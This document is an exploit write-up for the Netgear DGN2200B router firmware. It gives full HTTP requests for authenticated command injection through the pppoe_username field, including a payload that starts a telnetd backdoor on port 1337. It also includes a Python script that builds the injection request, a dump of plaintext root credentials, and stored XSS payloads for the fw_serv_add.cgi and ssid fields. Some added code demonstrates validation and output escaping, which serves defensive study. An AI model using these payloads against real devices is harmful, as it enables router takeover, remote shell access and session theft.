
Netgear DGN2200B Multiple EXPs

0x01 Overview

The Netgear DGN2200B running firmware 1.0.0.36_7.0.36 has multiple security vulnerabilities. By exploiting them an attacker can obtain sensitive information, execute arbitrary commands, execute injected HTML and script code, and steal cookies.

0x02 EXP

EXP01 (requires authentication to the web interface)

The pppoe_username parameter is not validated before it is used, so an authenticated attacker can inject and execute arbitrary commands on the device through it. The request below authenticates with HTTP Basic (admin:password) and injects a ping as a proof of execution.
Example:
 POST /pppoe.cgi HTTP/1.1
 Host: 192.168.0.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.0.1/BAS_pppoe.htm
 Cookie: uid=vjkqK779eJ
 Authorization: Basic YWRtaW46cGFzc3dvcmQ=
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 593
 Connection: close
 login_type=PPPoE%28PPP+over+Ethernet%29&pppoe_username=%26%20ping%20-c%201%20192%2e168%2e0%2e2%20%26&pppoe_passwd=69cw20hb&pppoe_servicename=&pppoe_dod=1&pppoe_idletime=5&WANAssign=Dynamic&DNSAssign=0&en_nat=1&MACAssign=0&apply=%C3%9Cbernehmen&runtest=yes&wan_ipaddr=0.0.0.0&pppoe_localip=0.0.0.0&wan_dns_sel=0&wan_dns1_pri=0.0.0.0&wan_dns1_sec=...&wan_hwaddr_sel=0&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0

The relevant field is pppoe_username. To start telnetd on port 1337, submit the value & telnetd -p 1337 & (the leading & terminates the device's own command and the trailing & backgrounds ours), URL-encoded as %26%20telnetd%20-p%201337%20%26.
Wait roughly 30 s: the device saves the configuration, the injected command runs, and the service is listening.
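The following is an added example, not code from the original post: it builds the authenticated POST to /pppoe.cgi with a shell-injecting pppoe_username, shows what a shell sees after decoding, and shows the allowlist check the firmware is missing. The host, the admin:password credentials and the dummy PPPoE password are assumptions taken from the request above; the ping and telnetd payloads are the ones the post describes.

```python
import base64
import re
from urllib.parse import quote, unquote

HOST = "192.168.0.1"           # assumed LAN address of the router, as in the post
CREDS = ("admin", "password")  # assumed web-interface credentials, as in the post


def injected_username(cmd: str) -> str:
    """URL-encoded pppoe_username that appends `cmd` to whatever the device runs.

    The value is stored and later interpolated into a shell command line, so a
    leading '&' ends the device's own command and the trailing '&' backgrounds ours.
    """
    return quote(f"& {cmd} &", safe="")


def shell_view(encoded_username: str) -> str:
    """What the shell receives once the CGI has percent-decoded the field."""
    return unquote(encoded_username)


def build_request(cmd: str) -> str:
    """Raw HTTP/1.1 POST carrying the injection.

    Only the fields needed for the injection are included; the capture in the
    post carries many more constant form fields, which are omitted here.
    """
    fields = [
        ("login_type", quote("PPPoE(PPP over Ethernet)", safe="")),
        ("pppoe_username", injected_username(cmd)),
        ("pppoe_passwd", "x"),                       # assumed dummy PPPoE password
        ("apply", quote("Übernehmen", safe="")),     # German UI "Apply" button, as captured
        ("runtest", "yes"),
    ]
    body = "&".join(f"{k}={v}" for k, v in fields)   # body is pure ASCII, so len() == bytes
    auth = base64.b64encode(f"{CREDS[0]}:{CREDS[1]}".encode()).decode()
    return (
        f"POST /pppoe.cgi HTTP/1.1\r\n"
        f"Host: {HOST}\r\n"
        f"Authorization: Basic {auth}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        f"\r\n{body}"
    )


# The check the firmware lacks: a PPPoE username is a user@realm-style token,
# so anything outside a strict allowlist should be rejected before the value
# can reach a shell. Length and character set are this example's assumption.
PPPOE_USERNAME_RE = re.compile(r"[A-Za-z0-9._@+-]{1,64}")


def is_valid_pppoe_username(value: str) -> bool:
    return PPPOE_USERNAME_RE.fullmatch(value) is not None


if __name__ == "__main__":
    print(build_request("telnetd -p 1337"))
```

To send it, pipe the printed request into a raw TCP client (for example, the printed text into nc against the router), or paste the body into an interception proxy; the point of the encoding step is that the CGI decodes the field before handing it to the shell, so %26 and %20 become a live & and spaces.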

EXP02

Stored credentials are not hashed: /etc/passwd holds them in plaintext. Note also that every account, including guest, has UID 0 and GID 0, so any of these logins is root.
~ # cat /etc/passwd
 nobody:*:0:0:nobody:/:/bin/sh
 admin:password:0:0:admin:/:/bin/sh
 guest:guest:0:0:guest:/:/bin/sh
 ~ #
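An added example, not from the original post: a small check that parses /etc/passwd output and flags accounts whose password field is neither a shadow marker nor a crypt(3) hash, reporting UID 0 accounts separately. The sample text is the listing from the post, embedded here as constructed input.

```python
# Constructed input: the /etc/passwd listing shown in the post.
SAMPLE_PASSWD = """nobody:*:0:0:nobody:/:/bin/sh
admin:password:0:0:admin:/:/bin/sh
guest:guest:0:0:guest:/:/bin/sh
"""

# Values in the password field that mean "no password here" rather than a secret.
SHADOW_MARKERS = {"x", "*", "!", "!!"}


def field_is_hash(pw: str) -> bool:
    """True for modular-crypt ($id$salt$hash) or 13-char traditional DES crypt."""
    if pw.startswith("$") and pw.count("$") >= 3:
        return True
    return len(pw) == 13 and all(c.isalnum() or c in "./" for c in pw)


def find_weak_password_fields(passwd_text: str) -> list:
    """Return one finding per account whose password field is plaintext or empty."""
    findings = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:          # malformed line; skip rather than guess
            continue
        user, pw, uid = parts[0], parts[1], parts[2]
        if pw in SHADOW_MARKERS or field_is_hash(pw):
            continue
        findings.append({
            "user": user,
            "reason": "empty" if pw == "" else "plaintext",
            "password": pw,
            "uid": int(uid),
            "is_root": uid == "0",
        })
    return findings


if __name__ == "__main__":
    for f in find_weak_password_fields(SAMPLE_PASSWD):
        print(f"{f['user']}: {f['reason']} password field"
              f"{' (UID 0)' if f['is_root'] else ''}: {f['password']!r}")
```

Run the same function over a passwd file pulled from any firmware image or from a shell on the device; the 13-character DES check is deliberately loose, since the goal is to surface fields that are obviously not hashes.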

EXP03

First: in the firewall services module (fw_serv_add.cgi), the userdefined parameter is not strictly validated. An authenticated user can submit JavaScript that is stored and rendered back to later visitors, giving a stored XSS.
POST /fw_serv_add.cgi HTTP/1.1
 Host: 192.168.0.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.0.1/fw_serv.cgi
 Cookie: uid=vjkqK779eJ
 Authorization: Basic xxxx=
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 114

 userdefined="><img src="0" onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0

The same request can also be sent as an HTTP GET.


Second: the ssid parameter (wlg_sec_profile_main.cgi) is not strictly validated either. The ssid value in the captured request below is double URL-encoded, and it is cut off in this reproduction.
 
 POST /wlg_sec_profile_main.cgi HTTP/1.1
 Host: 192.168.0.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.0.1/WLG_wireless2_2.htm
 Cookie: uid=vjkqK779eJ
 Authorization: Basic xxxx=
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 328

 ssidSelect=1&ssid=%2522%253E%253Cscript%253Ealert%25281%2529%253&WRegion=5&w_channel=0&opmode=20n&enable_ap=1&enable_ssid_bc=1&security_type=AUTO-PSK&passphrase=friendlytrain824&Apply=%C3%9Cbernehmen&tempSetting=0&tempRegion=5&initChannel=0&h_opmode=20n&wds_enable=0&ver_type=WW&pfChanged=0&ssid_sel_submit=0&secure_sel_submit=0
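An added example, not code from the original post, covering both stored XSS sinks above: it decodes the two injected values as the device would (the ssid one twice, since it was sent double-encoded), renders each into an assumed attribute template the way a vulnerable page would, and shows that escaping the value on output keeps it inside the attribute. The template strings are an assumption about how the firmware echoes saved values; the payloads are the ones from the two requests.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Payloads as they appear in the two captured requests.
USERDEFINED_PAYLOAD = '"><img src="0" onerror=alert(1)>'
SSID_PAYLOAD_ENCODED = "%2522%253E%253Cscript%253Ealert%25281%2529%253"  # double-encoded, truncated as in the post


def decode_form_value(raw: str, rounds: int = 2) -> str:
    """Percent-decode `rounds` times; an invalid trailing escape is left as-is."""
    for _ in range(rounds):
        raw = unquote(raw)
    return raw


def render_unsafe(field: str, value: str) -> str:
    # Assumed vulnerable rendering: the stored value is placed into the
    # attribute verbatim, so a leading '">' closes it and starts a new tag.
    return f'<input type="text" name="{field}" value="{value}">'


def render_safe(field: str, value: str) -> str:
    # Output encoding with quote=True escapes the double quote as well as <, >, &.
    return f'<input type="text" name="{field}" value="{html.escape(value, quote=True)}">'


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup: str) -> list:
    """Start tags a browser-like tokenizer would see; extra tags mean the value broke out."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


if __name__ == "__main__":
    ssid = decode_form_value(SSID_PAYLOAD_ENCODED)
    for field, value in (("userdefined", USERDEFINED_PAYLOAD), ("ssid", ssid)):
        print(field, "unsafe:", tags_in(render_unsafe(field, value)))
        print(field, "safe:  ", tags_in(render_safe(field, value)))
```

The tag count is the practical test: a single input tag after rendering means the value stayed data, while an extra img or script tag means the stored value became markup, which is what the alert(1) in both requests demonstrates in a browser.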

